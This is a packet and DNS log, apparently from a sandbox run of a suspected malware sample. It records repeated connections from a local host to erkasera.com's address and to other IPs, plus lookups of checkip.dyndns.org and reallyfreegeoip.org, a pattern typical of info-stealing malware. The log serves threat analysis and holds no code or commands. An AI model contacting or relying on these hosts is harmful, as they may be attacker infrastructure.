Oct 28, 2024 19:04:30.569680929 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.569708109 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.569818974 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.569834948 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.569886923 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.030155897 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.030173063 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.030194998 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.030289888 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.030314922 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.030376911 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.184497118 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.184530973 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.184704065 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.184717894 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.184766054 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.491882086 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.491910934 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.492055893 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.492074966 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.492141962 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.651447058 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.651469946 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.651629925 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.651629925 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.651640892 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.651684999 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.799889088 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.799925089 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.799978971 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.799995899 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.800050020 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.801220894 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.801239967 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.801315069 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:31.801321983 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:31.801372051 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.226561069 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.226576090 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.226598024 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.226672888 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.226691961 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.226725101 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.226752996 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.227271080 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.227291107 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.227330923 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.227339029 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.227375031 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.227390051 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.227777958 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.227803946 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.227842093 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.227848053 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.227902889 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.264297009 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.264319897 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.264389992 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.264395952 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.264436007 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.264458895 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.265887022 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.265904903 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.265980959 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.265986919 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.266026020 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.266046047 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.417042017 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.417073011 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.417165995 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.417177916 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.417228937 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.418018103 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.418037891 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.418091059 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.418097019 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.418126106 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.418154001 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.570040941 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.570065975 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.570158005 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.570172071 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.570223093 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.570720911 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.570746899 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.570784092 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.570790052 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.570837975 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.571400881 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.571420908 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.571485043 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.571491003 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.571536064 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.724226952 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.724248886 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.724366903 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.724379063 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.724422932 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.725163937 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.725183010 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.725347996 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.725353956 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.725416899 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.844095945 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.844124079 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.844206095 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.844218016 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.844259977 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.844283104 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.878138065 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.878160000 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.878220081 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.878227949 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.878271103 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.878297091 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.878942013 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.878962040 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.879014015 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.879019976 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.879057884 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.879086971 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.998028994 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.998059034 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.998162985 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:32.998178959 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:32.998233080 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:33.030900002 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:33.030920982 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:33.031017065 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:33.031023979 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:33.031044960 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:33.031068087 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:33.031073093 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:33.031119108 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:33.031120062 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:33.031171083 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:33.034703016 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:34.055002928 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:34.060623884 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:34.060714006 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:34.060961008 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:34.066338062 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:34.912925959 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:34.917491913 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:34.923095942 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:35.172844887 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:35.210861921 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:35.210894108 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:35.210971117 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:35.215816975 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:35.215831041 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:35.218856096 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:35.867651939 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:35.867788076 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:35.869541883 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:35.869549036 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:35.869971991 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:35.917526007 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:35.959367037 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:36.075131893 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:36.075351954 CET	443	49754	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:36.075597048 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:36.078221083 CET	49754	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:36.081614017 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:36.087187052 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:36.338349104 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:36.340836048 CET	49755	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:36.340914965 CET	443	49755	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:36.341020107 CET	49755	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:36.341379881 CET	49755	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:36.341418028 CET	443	49755	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:36.390779018 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:36.985598087 CET	443	49755	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:36.990958929 CET	49755	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:36.991031885 CET	443	49755	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:37.154939890 CET	443	49755	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:37.154997110 CET	443	49755	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:37.155152082 CET	49755	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:37.155555010 CET	49755	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:37.159027100 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:37.160343885 CET	49756	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:37.164701939 CET	80	49753	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:37.164782047 CET	49753	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:37.165682077 CET	80	49756	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:37.165781021 CET	49756	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:37.165872097 CET	49756	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:37.171443939 CET	80	49756	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:38.034620047 CET	80	49756	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:38.036828041 CET	49757	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:38.036880016 CET	443	49757	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:38.036962032 CET	49757	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:38.037239075 CET	49757	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:38.037257910 CET	443	49757	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:38.078355074 CET	49756	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:38.679750919 CET	443	49757	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:38.681421995 CET	49757	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:38.681449890 CET	443	49757	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:38.845911026 CET	443	49757	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:38.846080065 CET	443	49757	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:38.846147060 CET	49757	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:38.846697092 CET	49757	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:38.851125002 CET	49758	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:38.856590986 CET	80	49758	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:38.856700897 CET	49758	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:38.856770992 CET	49758	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:38.862140894 CET	80	49758	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:39.731909037 CET	80	49758	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:39.733306885 CET	49759	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:39.733352900 CET	443	49759	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:39.733454943 CET	49759	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:39.733707905 CET	49759	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:39.733728886 CET	443	49759	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:39.781366110 CET	49758	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:40.356816053 CET	443	49759	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:40.358911037 CET	49759	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:40.358947992 CET	443	49759	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:40.531429052 CET	443	49759	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:40.531501055 CET	443	49759	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:40.531653881 CET	49759	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:40.532152891 CET	49759	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:40.536401987 CET	49758	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:40.537512064 CET	49760	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:40.543478012 CET	80	49758	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:40.543581963 CET	49758	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:40.544068098 CET	80	49760	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:40.544152975 CET	49760	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:40.544444084 CET	49760	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:40.551820993 CET	80	49760	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:41.401293039 CET	80	49760	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:41.403429031 CET	49761	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:41.403522015 CET	443	49761	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:41.403667927 CET	49761	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:41.404048920 CET	49761	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:41.404087067 CET	443	49761	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:41.453248024 CET	49760	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:42.051501989 CET	443	49761	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:42.054219961 CET	49761	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:42.054279089 CET	443	49761	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:42.212574959 CET	443	49761	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:42.212651014 CET	443	49761	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:42.212745905 CET	49761	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:42.213375092 CET	49761	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:42.217650890 CET	49760	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:42.219300985 CET	49762	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:42.223803043 CET	80	49760	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:42.223906040 CET	49760	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:42.224663973 CET	80	49762	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:42.224740982 CET	49762	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:42.224889040 CET	49762	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:42.230674028 CET	80	49762	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:43.099031925 CET	80	49762	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:43.101110935 CET	49763	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:43.101219893 CET	443	49763	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:43.101448059 CET	49763	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:43.101730108 CET	49763	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:43.101768017 CET	443	49763	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:43.140918016 CET	49762	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:43.702303886 CET	443	49763	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:43.704854965 CET	49763	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:43.704917908 CET	443	49763	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:43.856975079 CET	443	49763	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:43.857057095 CET	443	49763	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:43.857115984 CET	49763	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:43.857546091 CET	49763	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:43.860932112 CET	49762	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:43.862241030 CET	49764	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:43.866586924 CET	80	49762	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:43.866662979 CET	49762	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:43.867777109 CET	80	49764	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:43.867855072 CET	49764	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:43.867958069 CET	49764	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:43.873358965 CET	80	49764	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:44.730232954 CET	80	49764	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:44.731589079 CET	49765	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:44.731653929 CET	443	49765	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:44.731748104 CET	49765	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:44.732290983 CET	49765	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:44.732311010 CET	443	49765	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:44.781402111 CET	49764	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:45.341197968 CET	443	49765	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:45.342699051 CET	49765	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:45.342732906 CET	443	49765	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:45.494141102 CET	443	49765	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:45.494210005 CET	443	49765	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:45.494268894 CET	49765	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:45.494769096 CET	49765	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:45.498558044 CET	49764	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:45.499628067 CET	49766	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:45.504389048 CET	80	49764	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:45.504451036 CET	49764	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:45.505053997 CET	80	49766	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:45.505124092 CET	49766	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:45.505220890 CET	49766	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:45.510550976 CET	80	49766	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:46.404679060 CET	80	49766	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:46.405972004 CET	49767	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:46.406007051 CET	443	49767	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:46.406090021 CET	49767	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:46.406322002 CET	49767	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:46.406337023 CET	443	49767	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:46.453351974 CET	49766	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:47.052164078 CET	443	49767	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:47.053899050 CET	49767	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:47.053926945 CET	443	49767	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:47.224698067 CET	443	49767	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:47.224746943 CET	443	49767	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:47.224797010 CET	49767	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:47.225203037 CET	49767	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:05:25.153326988 CET	80	49734	132.226.247.73	192.168.2.4
Oct 28, 2024 19:05:25.153570890 CET	49734	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:05:33.662194014 CET	80	49750	132.226.247.73	192.168.2.4
Oct 28, 2024 19:05:33.662374020 CET	49750	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:05:43.170407057 CET	80	49756	132.226.247.73	192.168.2.4
Oct 28, 2024 19:05:43.170469046 CET	49756	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:05:51.544769049 CET	80	49766	132.226.247.73	192.168.2.4
Oct 28, 2024 19:05:51.544836998 CET	49766	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:06:08.547365904 CET	49750	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:06:08.553354025 CET	80	49750	132.226.247.73	192.168.2.4
Oct 28, 2024 19:06:26.407280922 CET	49766	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:06:26.413105011 CET	80	49766	132.226.247.73	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 19:04:06.795861006 CET	55767	53	192.168.2.4	1.1.1.1
Oct 28, 2024 19:04:06.968887091 CET	53	55767	1.1.1.1	192.168.2.4
Oct 28, 2024 19:04:15.957389116 CET	61131	53	192.168.2.4	1.1.1.1
Oct 28, 2024 19:04:15.965699911 CET	53	61131	1.1.1.1	192.168.2.4
Oct 28, 2024 19:04:17.181040049 CET	60281	53	192.168.2.4	1.1.1.1
Oct 28, 2024 19:04:17.190368891 CET	53	60281	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 19:04:06.795861006 CET	192.168.2.4	1.1.1.1	0xed2b	Standard query (0)	erkasera.com	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:15.957389116 CET	192.168.2.4	1.1.1.1	0xac19	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:17.181040049 CET	192.168.2.4	1.1.1.1	0x1d7c	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 19:04:06.968887091 CET	1.1.1.1	192.168.2.4	0xed2b	No error (0)	erkasera.com		188.132.193.46	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:15.965699911 CET	1.1.1.1	192.168.2.4	0xac19	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
